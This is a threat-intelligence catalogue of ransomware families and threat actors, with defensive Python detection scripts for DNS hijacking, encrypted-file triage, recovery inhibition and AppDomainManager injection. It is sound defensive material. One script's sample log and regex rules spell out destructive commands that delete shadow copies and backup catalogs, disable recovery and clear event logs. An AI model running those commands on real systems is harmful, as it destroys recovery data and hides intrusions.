Directorate of Revenue Intelligence

Direwolf

Dire Wolf is a double-extortion ransomware group that first appeared around May 2025, combining file encryption with data theft and targeting industries such as manufacturing and technology in the U.S., Thailand, Taiwan, Singapore, Türkiye and other countries. The encryptor is written in Go and delivered as a UPX-packed binary; it uses Curve25519 key exchange with ChaCha20 to encrypt files, appends a .direwolf extension, and deletes backups, disables logging and terminates key services to block recovery. Victims receive customized ransom notes containing live-chat credentials and a victim-specific portal, indicating a professional, targeted operation.

DirtyDecrypt

Ransomware

Dishwasher

Ransomware

DiskDoctor

A Scarab ransomware variant that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT.

Dispossessor

Dispossessor, active since August 2023, was a data-extortion ransomware-as-a-service group led by the moniker "Brain". The group quickly expanded from U.S.-focused attacks to target small and mid-sized organizations globally—across sectors like healthcare, finance, transportation, education, and manufacturing. Their tactics included exploiting weak passwords and lack of multifactor authentication to gain access, followed by data exfiltration and staged extortion: victims were contacted via email or phone with links to proof-video platforms, and exposed on Tor-based leak sites if no payment was made. Many of the organizations targeted (approximately 43 identified) were across diverse countries including the U.S., Canada, Brazil, India, Germany, and more. By mid-2024, international law enforcement—including the FBI, UK National Crime Agency, and German agencies—successfully dismantled their infrastructure.

District

Ransomware

DIZZY PANDA

DIZZY PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Django

Ransomware

DMA Locker 1.0-2.0-3.0

Ransomware

DMA Locker 4.0

Ransomware

DMALocker 3.0

Ransomware

DMALocker Imposter

Ransomware

DMALocker

Ransomware. Encrypted files keep their original extension; instead each carries a version-specific prefix: version 1: ABCXYZ11; version 2: !DMALOCK; version 3: !DMALOCK3.0; version 4: !DMALOCK4.0.

DN

It targets English-speaking users and so can infect victims worldwide. It poses as a "Chrome Update" to confuse victims and imitates the Chrome update process while encrypting files. Do not pay the ransom: this malware will not restore the computer.

DNRansomware

Ransomware. Decryption code: 83KYG9NW-3K39V-2T3HJ-93F3Q-GT

DNSpionage

Cisco Talos discovered a campaign targeting Lebanon and the United Arab Emirates (UAE), affecting .gov domains as well as a private Lebanese airline. The adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuously as possible during the attacks. Based on the actor's infrastructure and TTPs, Talos could not connect it to any other recently observed campaign or actor. The campaign uses two fake websites carrying job postings to compromise targets via malicious Microsoft Office documents with embedded macros. The malware, which Talos named DNSpionage, supports both HTTP and DNS communication with the attackers. In a separate campaign, the attackers used the same IP address to redirect the DNS of legitimate .gov and private-company domains, and for each DNS compromise carefully obtained Let's Encrypt certificates for the redirected domains; Let's Encrypt issues X.509 TLS certificates free of charge, so the hijacked names could present valid TLS without browser warnings. It is not known whether the DNS redirections succeeded. Talos's report breaks down the attackers' methods, the malicious documents and "help wanted" lure sites, the DNS redirection, and the timeline of events.
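The DNS-hijack-then-certificate pattern above is detectable from the defender's side. The following is an added example, not code from Talos or from this catalogue: it compares a domain's observed records against an expected baseline and then checks Certificate Transparency (CT) entries against the issuers the organisation actually uses, flagging a certificate obtained while the records are hijacked. All record values, issuer names, timestamps and addresses are constructed; in practice the observed records would come from resolvers queried from several vantage points and the CT entries from a CT monitor, both of which are assumed here.

```python
"""Added example (not part of the Talos report or this catalogue): flag DNS
hijacks and rogue certificate issuance of the kind described for DNSpionage.

Two checks, both over constructed data so the example runs offline:
  1. compare the currently observed records for a domain against a
     baseline of expected values and report any drift;
  2. compare Certificate Transparency (CT) entries against the issuers the
     domain is expected to use, and flag certificates issued while the
     records are drifted.
Record values, issuers and timestamps below are made up for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class CtEntry:
    domain: str
    issuer: str
    not_before: datetime


# Constructed baseline: what the organisation expects its own records to be.
BASELINE = {
    "mail.example.gov": {"A": {"203.0.113.10"}, "NS": {"ns1.example.gov", "ns2.example.gov"}},
    "vpn.example.gov": {"A": {"203.0.113.20"}, "NS": {"ns1.example.gov", "ns2.example.gov"}},
}

# Constructed observation: mail.example.gov now resolves to an attacker host
# (198.51.100.7 is a documentation address used as a stand-in).
OBSERVED = {
    "mail.example.gov": {"A": {"198.51.100.7"}, "NS": {"ns1.example.gov", "ns2.example.gov"}},
    "vpn.example.gov": {"A": {"203.0.113.20"}, "NS": {"ns1.example.gov", "ns2.example.gov"}},
}

# Constructed CT log sample. The organisation only ever buys from "ExampleCA".
CT_ENTRIES = [
    CtEntry("mail.example.gov", "ExampleCA", datetime(2018, 1, 5, tzinfo=timezone.utc)),
    CtEntry("mail.example.gov", "Let's Encrypt", datetime(2018, 11, 6, tzinfo=timezone.utc)),
    CtEntry("vpn.example.gov", "ExampleCA", datetime(2018, 3, 1, tzinfo=timezone.utc)),
]

EXPECTED_ISSUERS = {"ExampleCA"}


def dns_drift(baseline, observed):
    """Return {domain: {rtype: (expected, seen)}} for every record that differs."""
    drift = {}
    for domain, records in baseline.items():
        seen_records = observed.get(domain, {})
        for rtype, expected in records.items():
            seen = seen_records.get(rtype, set())
            if seen != expected:
                drift.setdefault(domain, {})[rtype] = (expected, seen)
    return drift


def unexpected_certs(entries, expected_issuers, drifted_domains):
    """Return (entry, reason) pairs worth an alert.

    A cert from an issuer the organisation never uses is suspicious on its
    own; one issued for a domain whose DNS is currently drifted is the
    DNSpionage pattern (hijack first, then obtain a valid cert for the
    redirected name so TLS raises no warning).
    """
    alerts = []
    for e in entries:
        if e.issuer not in expected_issuers:
            reason = "unexpected issuer"
            if e.domain in drifted_domains:
                reason += " while DNS records are hijacked"
            alerts.append((e, reason))
    return alerts


def run_checks(baseline=BASELINE, observed=OBSERVED, entries=CT_ENTRIES,
               expected_issuers=EXPECTED_ISSUERS):
    drift = dns_drift(baseline, observed)
    alerts = unexpected_certs(entries, expected_issuers, set(drift))
    return drift, alerts


if __name__ == "__main__":
    drift, alerts = run_checks()
    for domain, changes in drift.items():
        for rtype, (expected, seen) in changes.items():
            print(f"DRIFT {domain} {rtype}: expected {sorted(expected)}, saw {sorted(seen)}")
    for entry, reason in alerts:
        print(f"CERT  {entry.domain} issued by {entry.issuer!r} on {entry.not_before:%Y-%m-%d}: {reason}")
```

The preventive counterpart is a CAA record that restricts issuance to the CAs the organisation actually uses: with that in place the attacker's Let's Encrypt request fails at validation time, and the CT check above becomes a backstop rather than the only line of defence.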

Dodger

Ransomware

DogeCrypt

Ransomware

DolphinTear

Ransomware

Domestic Kitten

An extensive surveillance operation targets specific groups of individuals with malicious mobile apps that collect sensitive information on the device along with surrounding voice recordings. Researchers with CheckPoint discovered the attack and named it Domestic Kitten. The targets are Kurdish and Turkish natives, and ISIS supporters, all Iranian citizens.

Domino

Ransomware, based on Hidden Tear.

Donald Trump 2 Ransomware

It targets English-speaking users and so can infect victims worldwide. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files. The original ransomware under this name is described at http://id-ransomware.blogspot.co.il/2016/09/donald-trump-ransomware.html

Donald Trump

Ransomware

Donation1

Ransomware

Done

Ransomware

donex

The ransomware group known as DoNex was first identified in mid-March 2024. According to the data collected, the samples used by the group were compiled in mid-February, suggesting that it is a relatively new operation.

DoNotChange

Ransomware

Dont_Worry

Ransomware

Donut

S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmm@tutanota.com.

Donutleaks

TOX: D3404141459BC7206CC4AFEC16A3403F262C0937A732C12644E7CA97F0615201A519F7EAB2E2

DOPPEL SPIDER

In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER's inception, CrowdStrike Intelligence observed multiple big game hunting (BGH) incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to gauge the value of each victim organization before setting its price.

DORRA

DORRA is a ransomware variant derived from the Makop family. It appends the .DORRA extension to encrypted files together with a unique victim ID and the developer's email address, then drops a ransom note as a text file named README-WANING.txt instructing victims to contact the actor at that address to have their data decrypted. Notably, the contact address is an ordinary mailbox on Microsoft's Outlook service.
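The Dharma, DMALocker and DORRA entries above describe two kinds of artefact an encrypted file carries: a rewritten name (victim ID, contact email, family extension) or a version marker at the start of the content. The following triage script is an added example, not code from this catalogue or from any of those families. Every sample file name, ID, email address and byte string in it is constructed; the exact layout assumed for DORRA names (the Makop convention of .[ID].[email].EXT) is an assumption, since the entry above does not give the order of the appended fields.

```python
"""Added example (not code from this catalogue or from any of the ransomware
families it describes): triage files on a suspected victim host by the two
kinds of artefact the Dharma, DORRA and DMALocker entries describe.

  * Dharma/CrySiS and Makop-derived DORRA leave their mark in the file NAME:
    a victim ID, a contact e-mail and a family extension are appended.
  * DMALocker leaves the name alone and instead writes a version-specific
    marker at the START of the file contents.

All sample file names, IDs, e-mail addresses and byte strings below are
constructed. The DORRA name layout is assumed from the Makop convention
(.[ID].[email].EXT); adjust the regex if a real sample differs.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Dharma/CrySiS: original.ext.id-<hex ID>.[<email>].<campaign extension>
DHARMA_RE = re.compile(
    r"^(?P<original>.+?)\.id-(?P<victim_id>[0-9A-Fa-f]+)\.\[(?P<email>[^\]]+)\]\.(?P<ext>[^.]+)$"
)
# Makop family (DORRA): original.ext.[<hex ID>].[<email>].DORRA   (assumed layout)
MAKOP_RE = re.compile(
    r"^(?P<original>.+?)\.\[(?P<victim_id>[0-9A-Fa-f]+)\]\.\[(?P<email>[^\]]+)\]\.(?P<ext>[^.]+)$"
)

# DMALocker content markers, ordered longest-first: "!DMALOCK" is itself a
# prefix of the 3.0 and 4.0 markers, so a naive first-match would misversion them.
DMALOCKER_MARKERS = [
    (b"!DMALOCK4.0", "DMALocker 4.0"),
    (b"!DMALOCK3.0", "DMALocker 3.0"),
    (b"!DMALOCK", "DMALocker 2.0"),
    (b"ABCXYZ11", "DMALocker 1.0"),
]
MAX_MARKER = max(len(m) for m, _ in DMALOCKER_MARKERS)


@dataclass(frozen=True)
class Finding:
    path: str
    family: str
    victim_id: Optional[str] = None
    email: Optional[str] = None
    original_name: Optional[str] = None


def classify_name(path: str) -> Optional[Finding]:
    """Recognise Dharma and Makop/DORRA naming; return None for a clean name."""
    name = path.rsplit("/", 1)[-1]
    m = DHARMA_RE.match(name)
    if m:
        return Finding(path, f"Dharma/CrySiS (.{m['ext']})", m["victim_id"], m["email"], m["original"])
    m = MAKOP_RE.match(name)
    if m:
        return Finding(path, f"Makop family (.{m['ext']})", m["victim_id"], m["email"], m["original"])
    return None


def classify_header(path: str, head: bytes) -> Optional[Finding]:
    """Recognise a DMALocker version from the first bytes of the file."""
    for marker, family in DMALOCKER_MARKERS:   # longest-first, see above
        if head.startswith(marker):
            return Finding(path, family)
    return None


def triage(files: dict) -> list:
    """files maps path -> first bytes of content. Returns every finding."""
    findings = []
    for path, head in files.items():
        hit = classify_name(path) or classify_header(path, head[:MAX_MARKER])
        if hit:
            findings.append(hit)
    return findings


# Constructed sample: what a directory walk plus a short header read might yield.
SAMPLE_FILES = {
    "C:/Users/a/Documents/q3-report.xlsx.id-1E857D00.[bitcoin143@india.com].dharma": b"",
    "C:/Users/a/Documents/plan.docx.[8A3F21C0].[attacker@outlook.com].DORRA": b"",
    "C:/Users/a/Pictures/holiday.jpg": b"!DMALOCK3.0\x00\x10",
    "C:/Users/a/Pictures/cat.jpg": b"!DMALOCK\x00\x00\x00",
    "C:/Users/a/Pictures/dog.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00",   # untouched JPEG
}

if __name__ == "__main__":
    for f in triage(SAMPLE_FILES):
        print(f)
```

On a real host the dictionary would be filled by walking the file system and reading only the first MAX_MARKER bytes of each file, which keeps the sweep cheap even across large shares; the victim ID and contact address recovered from the names are what an incident responder needs to match the sample against public decryptor coverage and to group files by affiliate campaign.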

DotNoData

Ransomware

DotRansomware

The ransom note is written in English, so English-speaking users are the most likely targets, though anyone can be affected. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

DotZeroCMD

Ransomware

Državna Agencija za Istrage i Zaštitu

Državna Agencija za Istrage i Zaštitu (State Investigation and Protection Agency, SIPA)

Dr. Fucker

Ransomware

Dr. Jimbo

Ransomware

DragonBreath

DragonBreath (also tracked as Golden Eye Dog) targets Chinese-speaking users engaged in online gambling, employing techniques such as SERP poisoning, social engineering and DDoS attacks. The group uses trojanized NSIS installers to deliver RONINGLOADER, which executes a multi-stage process-injection workflow and deploys a modified Gh0st RAT for espionage. Its operations have included DLL sideloading and watering-hole websites used to implant trojans. The group is noted for strong anti-detection capabilities and has developed malware in several languages.

Dragonbridge

DRAGONBRIDGE is a Chinese state-sponsored threat actor known for engaging in information operations to promote the political interests of the People's Republic of China. They have been observed using AI-generated images and videos to spread propaganda on social media platforms. The group has targeted various countries and regions, including the US, Taiwan, and Japan, with narratives promoting pro-PRC viewpoints. DRAGONBRIDGE has been linked to campaigns discrediting the US political system, sowing division between allies, and criticizing specific companies and individuals.

Dragoncyber

Ransomware

Dragonfly 2.0

Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0's initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.

DragonForce Ransomware Group

DragonForce operates a Ransomware-as-a-Service (RaaS) affiliate program using two ransomware variants: LockBit 3.0 and a modified ContiV3. The group uses double extortion tactics, encrypting data and threatening to leak it unless paid. Launched in June 2024, the program offers affiliates 80% of ransoms and tools to manage attacks. Affiliates can customize ransomware, disable security, and set encryption parameters. DragonForce employs the BYOVD technique to disable security processes and erases Windows logs to hinder investigations.[[Group-IB DragonForce September 25 2024](/references/28279a56-60e8-4e88-9627-accc969fa48c)]

Dragonforce

DragonForce is a ransomware-as-a-service (RaaS) group first identified in late 2023. Originally linked to hacktivist activity, the group pivoted to financially motivated operations by early 2024. Since then, it has accelerated into a highly organized cartel-like network, providing customizable payloads to affiliates, a sophisticated affiliate portal, and shared infrastructure for leak sites and campaigns. The group has targeted a wide range of sectors globally, including major UK retailers such as M&S, Harrods, and Co-op, along with organizations in government, logistics, and manufacturing. Its operations are known for strategic branding flexibility, enabling affiliates to operate under their own labels using DragonForce’s backend services.

DragonRank

DragonRank is a threat actor primarily targeting web application services in Asia and Europe, utilizing TTPs associated with Simplified Chinese-speaking hacking groups. They exploit vulnerabilities in platforms like phpMyAdmin and WordPress to deploy web shells, enabling the installation of PlugX and BadIIS malware for black hat SEO practices. Their operations involve lateral movement within compromised networks to maintain control and elevate privileges, while also engaging in unethical online marketing strategies. DragonRank's activities include manipulating search engine rankings and distributing scam websites through compromised Windows IIS servers.

DragonSpark

DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.

Drakos

Ransomware

DriedSister

Ransomware

DriftingCloud

DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.

DRSD

Directorate of Defence Intelligence and Security (DRSD; Direction du Renseignement et de la Sécurité de la Défense) – Counter-intelligence and security for defence personnel, facilities and industry.

Drug Intelligence Division (DID)

Drug Intelligence Division (DID)

DualShot

Ransomware

DUMB Ransomware

It targets English-speaking users and so can infect victims worldwide. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

DummyEncrypter Ransomware

The ransom note is written in English, so English-speaking users are the most likely targets, though anyone can be affected. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

DummyLocker

Ransomware

DUNGEON SPIDER

DUNGEON SPIDER is a criminal group operating the ransomware most commonly known as Locky, which has been active since February 2016 and was last observed in late 2017. Locky is a ransomware tool that encrypts files using a combination of cryptographic algorithms: RSA with a key size of 2,048 bits, and AES with a key size of 128 bits. Locky targets a large number of file extensions and is able to encrypt data on shared network drives. In an attempt to further impact victims and prevent file recovery, Locky deletes all of the Shadow Volume Copies on the machine. DUNGEON SPIDER primarily relies on broad spam campaigns with malicious attachments for distribution. Locky is the community/industry name associated with this actor.
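Locky's deletion of Shadow Volume Copies, Dire Wolf's deletion of backups and disabling of logging and services, and DragonForce's erasure of Windows event logs are all visible in process-creation telemetry before encryption finishes. The following detector is an added example, not code from this catalogue or from any vendor report it summarises: it runs a small rule set over constructed log records and raises an alert only when several distinct recovery-inhibition steps occur on one host within a short window, which separates ransomware staging from a backup job that merely resizes shadow storage. The record format, the rules and the thresholds are this example's own choices.

```python
"""Added example (not part of this catalogue or of any vendor report it
summarises): detect the recovery-inhibition and log-clearing commands that
the Dire Wolf, DragonForce and Locky/DUNGEON SPIDER entries describe
(deleting Shadow Volume Copies and backups, disabling recovery, erasing
event logs, stopping services) from process-creation telemetry.

Input is a list of constructed log records in the form
  "<ISO time>|<host>|<user>|<parent image>|<command line>"
standing in for Sysmon event 1 / Windows event 4688 after export. The rule
set and the aggregation thresholds are this example's own choices.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, ATT&CK technique, compiled regex over the command line)
RULES = [
    ("shadow_copy_delete", "T1490",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)),
    ("shadow_storage_resize", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b.*?/maxsize=", re.I)),
    ("backup_catalog_delete", "T1490",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup|backup)\b", re.I)),
    ("recovery_disabled", "T1490",
     re.compile(r"\bbcdedit(\.exe)?\b.*?(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("eventlog_cleared", "T1070.001",
     re.compile(r"\b(wevtutil(\.exe)?\s+(cl|clear-log)\b|Clear-EventLog\b)", re.I)),
    ("service_stop", "T1489",
     re.compile(r"\b(net1?(\.exe)?\s+stop\s+|sc(\.exe)?\s+stop\s+|taskkill(\.exe)?\s+.*?/im\s+)", re.I)),
]

WINDOW = timedelta(minutes=10)   # distinct rules within this window on one host => staging
ALERT_RULES = 2                  # how many distinct rule names it takes


def parse(line):
    ts, host, user, parent, cmd = line.split("|", 4)
    return datetime.fromisoformat(ts), host, user, parent, cmd


def match_rules(cmd):
    """Return the (name, technique) pairs whose pattern appears in the command line."""
    return [(name, tech) for name, tech, rx in RULES if rx.search(cmd)]


def scan(lines):
    """Per-event hits: one dict per rule that fired on a record."""
    hits = []
    for line in lines:
        ts, host, user, parent, cmd = parse(line)
        for name, tech in match_rules(cmd):
            hits.append({"time": ts, "host": host, "user": user, "parent": parent,
                         "rule": name, "technique": tech, "cmd": cmd})
    return hits


def staging_alerts(hits, window=WINDOW, min_rules=ALERT_RULES):
    """Hosts where at least min_rules distinct rules fired within `window`.

    A single vssadmin invocation can be legitimate backup housekeeping; several
    different recovery-inhibition steps in quick succession almost never are.
    """
    by_host = defaultdict(list)
    for h in hits:
        by_host[h["host"]].append(h)
    alerts = {}
    for host, evs in by_host.items():
        evs.sort(key=lambda h: h["time"])
        for i, first in enumerate(evs):
            rules = {h["rule"] for h in evs[i:] if h["time"] - first["time"] <= window}
            if len(rules) >= min_rules:
                alerts[host] = sorted(rules)
                break
    return alerts


# Constructed telemetry. WS-042 shows a ransomware staging sequence; SRV-BK1
# is a backup server doing routine shadow-storage housekeeping.
SAMPLE_LOG = [
    "2025-06-02T02:14:01|WS-042|CORP\\svc_deploy|C:\\Windows\\System32\\cmd.exe|vssadmin.exe delete shadows /all /quiet",
    "2025-06-02T02:14:03|WS-042|CORP\\svc_deploy|C:\\Windows\\System32\\cmd.exe|wbadmin delete catalog -quiet",
    "2025-06-02T02:14:05|WS-042|CORP\\svc_deploy|C:\\Windows\\System32\\cmd.exe|bcdedit /set {default} recoveryenabled No",
    "2025-06-02T02:14:09|WS-042|CORP\\svc_deploy|C:\\Windows\\System32\\cmd.exe|wevtutil cl Security",
    "2025-06-02T02:14:11|WS-042|CORP\\svc_deploy|C:\\Windows\\System32\\cmd.exe|net stop MSSQLSERVER /y",
    "2025-06-02T03:00:00|SRV-BK1|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\svchost.exe|vssadmin resize shadowstorage /for=D: /on=D: /maxsize=20%",
    "2025-06-02T03:05:00|WS-007|CORP\\alice|C:\\Windows\\explorer.exe|notepad.exe C:\\Users\\alice\\notes.txt",
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(f"{h['time']:%H:%M:%S} {h['host']} {h['rule']} ({h['technique']}): {h['cmd']}")
    print("staging alerts:", staging_alerts(hits))
```

Event log clearing also produces Security event 1102 (and System event 104) regardless of which tool did it, so a production rule should take that event as an independent signal rather than relying on the wevtutil command line alone; the command-line rule above still catches the PowerShell and WMI variants that do not leave a distinctive process name.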

dunghill

Dunghill Leak is the publicly branded data leak site (DLS) operated by the Dark Angels ransomware group, established circa January 2023. Rather than a standalone encryption threat, it serves as the disclosure and extortion platform where stolen victim data is published if ransom demands are ignored. Dark Angels is known for highly targeted “big game hunting” tactics, exfiltrating tens to hundreds of terabytes of corporate data, often without encrypting systems. Victims include major industry players—like Johnson Controls, Sabre, Sysco, and a Fortune 50 firm—which reportedly paid a record-breaking $75 million USD ransom. The leak site is complemented by a mirrored Telegram channel for distributing victim announcements and maintaining negotiation traffic.

Dusk

Ransomware

Dust Storm

Threat actors behind the Operation Dust Storm have been active since at least 2010, the hackers targeted several organizations in Japan, South Korea, the US, Europe, and other Asian countries.

DustSquad

Prodaft researchers published a report on Paperbug, a cyber-espionage campaign by the suspected Russian-speaking group Nomadic Octopus (also tracked as DustSquad) that targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telecoms and public-service infrastructure, and the compromised devices included OT devices as well as computers, servers and mobile devices. Prodaft also gained access to one of the group's C&C server backend panels.

Dviide

Ransomware

DXXD

Ransomware

DynA-Crypt Ransomware

It targets English-speaking users and so can infect victims worldwide. It is spread via email spam, fake updates and malicious attachments, and encrypts files including music, MS Office and OpenOffice documents, pictures, videos and shared online files.

E Division – Intelligence Division

E Division – Intelligence Division

Earth Alux

Earth Alux is a China-linked APT group known for conducting cyberespionage attacks across various sectors, including government, technology, and telecommunications. They primarily exploit vulnerable services in exposed servers to gain initial access, implanting web shells like GODZILLA and deploying backdoors such as VARGEIT and COBEACON. The group employs tools like RSBINJECT and MASQLOADER for lateral movement and network discovery, while also utilizing RAILSETTER for persistence through mspaint injection. Their operations have predominantly targeted the APAC region and have extended to Latin America, with a focus on exfiltrating sensitive information to attacker-controlled cloud storage.

Earth Baxia

Earth Baxia is a threat actor operating out of China that targets government organizations in Taiwan and potentially across the APAC region. It gains access through spear-phishing emails and by exploiting the GeoServer vulnerability CVE-2024-36401 for remote code execution, then deploys customized Cobalt Strike components with altered signatures, uses GrimResource and AppDomainManager injection to deliver additional payloads, and operates a new backdoor named EAGLEDOOR that supports multi-protocol communication and payload delivery.
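AppDomainManager injection, one of the delivery techniques named above, works by making the .NET runtime load an attacker-chosen assembly as the AppDomainManager of a legitimate signed executable, either through a <runtime> section in the executable's .exe.config or through the APPDOMAIN_MANAGER_ASM and APPDOMAIN_MANAGER_TYPE environment variables. The scanner below is an added example, not code from Trend Micro's Earth Baxia research or from this catalogue; it finds both footholds in constructed sample data. The config files, paths, assembly names and environment block are invented.

```python
"""Added example (not code from Trend Micro's Earth Baxia research or from
this catalogue): find the footholds that AppDomainManager injection leaves
behind. The technique makes the .NET runtime load an attacker-chosen
assembly as the AppDomainManager for a legitimate signed executable, either
through a <runtime> section in the executable's .exe.config or through the
APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE environment variables.

The config documents and environment block below are constructed samples;
the file names and assembly names are invented.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import Optional

SUSPECT_ELEMENTS = ("appDomainManagerAssembly", "appDomainManagerType")
SUSPECT_ENV = ("APPDOMAIN_MANAGER_ASM", "APPDOMAIN_MANAGER_TYPE")


@dataclass(frozen=True)
class Foothold:
    source: str                  # config path or "environment"
    assembly: Optional[str]
    manager_type: Optional[str]
    note: str


def scan_config(path: str, xml_text: str) -> Optional[Foothold]:
    """Return a Foothold if the config names an AppDomainManager, else None."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return Foothold(path, None, None, "unparseable config (possible obfuscation)")
    found = {}
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]      # match on the local name, ignoring any namespace
        if tag in SUSPECT_ELEMENTS:
            found[tag] = elem.get("value", "")
    if not found:
        return None
    asm = found.get("appDomainManagerAssembly")
    typ = found.get("appDomainManagerType")
    note = "AppDomainManager override in config"
    if asm and "PublicKeyToken=null" in asm.replace(" ", ""):
        note += "; unsigned assembly"
    return Foothold(path, asm, typ, note)


def scan_environment(env: dict) -> Optional[Foothold]:
    """Return a Foothold if the process environment sets the override variables."""
    upper = {k.upper(): v for k, v in env.items()}   # Windows env names are case-insensitive
    if not any(k in upper for k in SUSPECT_ENV):
        return None
    return Foothold("environment", upper.get("APPDOMAIN_MANAGER_ASM"),
                    upper.get("APPDOMAIN_MANAGER_TYPE"), "AppDomainManager override in environment")


def scan_all(configs: dict, env: dict) -> list:
    """configs maps path -> XML text. Returns every foothold found."""
    results = [f for p, x in configs.items() if (f := scan_config(p, x))]
    if (f := scan_environment(env)):
        results.append(f)
    return results


# Constructed samples. The first config is benign and only pins the runtime
# version; the second has the injection shape.
SAMPLE_CONFIGS = {
    r"C:\Program Files\Vendor\tool.exe.config": """<?xml version="1.0"?>
<configuration>
  <startup><supportedRuntime version="v4.0" /></startup>
</configuration>""",
    r"C:\Users\Public\ms-updater.exe.config": """<?xml version="1.0"?>
<configuration>
  <runtime>
    <appDomainManagerAssembly value="Updater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="Updater.Manager" />
  </runtime>
</configuration>""",
}
SAMPLE_ENV = {"Path": r"C:\Windows", "APPDOMAIN_MANAGER_ASM": "Updater, Version=1.0.0.0",
              "APPDOMAIN_MANAGER_TYPE": "Updater.Manager"}

if __name__ == "__main__":
    for f in scan_all(SAMPLE_CONFIGS, SAMPLE_ENV):
        print(f)
```

A real sweep feeds scan_config with every *.exe.config found next to a .NET executable in a user-writable directory, and scan_environment with the environment block of each running .NET process; a signed vendor binary whose config points at an unsigned assembly in a world-writable path is the combination worth escalating.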

Earth Berberoka

According to TrendMicro, Earth Berberoka is a threat group originating from China that mainly focuses on targeting gambling websites. This group's campaign uses multiple malware families that target the Windows, Linux, and macOS platforms that have been attributed to Chinese-speaking actors. Aside from using tried-and-tested malware families that have been upgraded, such as PlugX and Gh0st RAT, Earth Berberoka has also developed a brand-new complex, multistage malware family, which has been dubbed PuppetLoader.

Earth Estries

Trend Micro found that Earth Estries relies heavily on DLL sideloading to load the tools in its arsenal. Aside from its custom backdoors, this intrusion set also uses common remote-control tools such as Cobalt Strike, PlugX and Meterpreter stagers interchangeably at various attack stages; these tools arrive as encrypted payloads loaded by custom loader DLLs.

Earth Freybug

Earth Freybug, assessed to be a subset of APT41, is a cyberthreat group active since at least 2012 that conducts espionage and financially motivated activity across sectors worldwide. The tactics, techniques and procedures in its recent campaign resemble those of Operation CuckooBees, described by Cybereason. The group combines LOLBins with custom malware; its recent tradecraft includes DLL hijacking and API unhooking via a newly discovered malware named UNAPIMON, which uses Microsoft Detours to unhook monitoring APIs so that child processes escape inspection. This was observed in a vmtoolsd.exe process creating remote scheduled tasks to deploy malicious batch files for reconnaissance and backdoor access. UNAPIMON's simplicity shows how little it takes to blind user-mode monitoring; restricting administrative privileges and adhering to the principle of least privilege limit what such a loader can reach.

Earth Kapre

Earth Kapre is an APT group specializing in cyberespionage. They target organizations in various countries through phishing campaigns using malicious attachments to infect machines. Earth Kapre employs techniques like abusing PowerShell, curl, and Program Compatibility Assistant to execute malicious commands and evade detection within targeted networks. The group has been active since at least 2018 and has been linked to multiple incidents involving data theft and espionage.

Earth Kitsune

Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.

Earth Krahang

Earth Krahang is an APT group targeting government organizations worldwide. They use spear-phishing emails, weak internet-facing servers, and custom backdoors like Cobalt Strike, RESHELL, and XDealer to conduct cyber espionage. The group creates VPN servers on infected systems, employs brute force attacks on email accounts, and exploits compromised government infrastructure to attack other governments. Earth Krahang has been linked to another China-linked actor, Earth Lusca, and is believed to be part of a specialized task force for cyber espionage against government institutions.

Earth Kurma

Earth Kurma is an APT group targeting government and telecommunications sectors in Southeast Asia, with a primary focus on data exfiltration. They employ advanced custom malware, including rootkits like KRNRAT and MORIYA, and utilize cloud storage services for exfiltration. Their toolsets include TESDAT and SIMPOBOXSPY, and they demonstrate adaptive TTPs and complex evasion techniques. Attribution overlaps with other APT groups, but distinct attack patterns warrant their separate designation.

